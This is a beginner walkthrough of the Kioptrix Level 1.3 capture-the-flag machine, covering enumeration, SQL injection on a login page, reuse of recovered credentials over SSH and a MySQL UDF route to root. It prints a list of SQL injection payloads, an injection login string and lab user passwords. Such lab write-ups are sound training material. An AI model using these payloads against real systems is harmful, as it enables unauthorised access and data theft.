KIOPTRIX: LEVEL 1.3 (#4) Walkthrough

This is similar to the past kioptrix series. Similarly, this is best for beginners. As usual, let me start with a beautiful quote.

This is similar to the past kioptrix series. Similarly, this is best for beginners. As usual, let me start with a beautiful quote.

The opportunity of defeating the enemy is provided by the enemy himself.” — Sun Tzu

Enumeration

Let’s start with enumeration…

sudo nmap -p- -T4 -A 192.168.103.183

We have found the running services:

  • ssh
  • http
  • smb

More Enumeration…

  1. SSH

This version of SSH does not have any particular vulnerability which we can exploit. However, there is a possible user enumeration weakness available.

2. HTTP

We got a cute goat Pic👻

Nothing sensitive in the source code and no robots.txt.

  • Nikto
Found no possible foothold.

We can find the version of the software as Apache/2.2.8 + PHP/5.2.4

  • GoBuster
john & robert 🤔…

3. SMB

Nothing interesting here…

Finding POI (Point Of Intrusion)

From the enumeration, i could say that we have few possible POIs. However, let me tell you what all are not the possible POIs:

  1. SSH — It does not have any exploit available. Go with possible User Enumeration on worst case.
  2. SMB — Found nothing sensitive on this.
  3. Apache and PHP are not having any Exploits available for this set-up.

Therefore, I could say that the POI will be through the website.

  • LFI / RFI
  • SQLi

Since i found a login page, i will test for SQLi.


Exploitation

I used Burp to test the with SQLi payloads.

Payload:

' 
'' 
` 
`` 
, 
" 
"" 
/ 
// 
\ 
\\ 
; 
' or " 
-- or #  
' OR '1 
' OR 1 -- - 
" OR "" = " 
" OR 1 = 1 -- - 
' OR '' = ' 
'=' 
'LIKE' 
'=0--+ 
 OR 1=1 
' OR 'x'='x 
' AND id IS NULL; -- 
'''''''''''''UNION SELECT '2 
%00 
/*…*/

Procedure:

  1. Catch the Login request in Burp.

2. Send it to Intruder and Use sniper.

3. Execute and Analyse the response Length.

I used creds as john:’OR’1

and got into the page…

This seems like a password Reuse case.🤔

Let me try the same on SSH…

  • robert:ADGAdsafdfwt4gadfga==
  • john:MyNameIsJohn
John got in…

But, it is a restricted shell…😩

https://www.aldeid.com/wiki/Lshell

Privilege Escalation

I found a UDF (User Defined Function in MySQL). Hence, i used https://recipeforroot.com/mysql-to-system-root/ to get myself root privileges.


Photo by Fernando Brasil on Unsplash